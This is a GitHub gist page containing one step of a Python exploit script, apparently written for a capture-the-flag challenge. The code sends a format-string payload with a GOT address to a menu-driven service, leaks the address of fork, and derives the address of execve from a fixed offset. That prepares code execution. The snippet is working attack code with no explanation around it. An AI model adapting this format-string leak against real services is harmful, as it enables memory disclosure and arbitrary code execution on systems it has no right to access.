Skip to content

Instantly share code, notes, and snippets.

@vanhoefm
Last active December 15, 2015 18:39
Show Gist options
  • Save vanhoefm/5305882 to your computer and use it in GitHub Desktop.
Save vanhoefm/5305882 to your computer and use it in GitHub Desktop.
# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment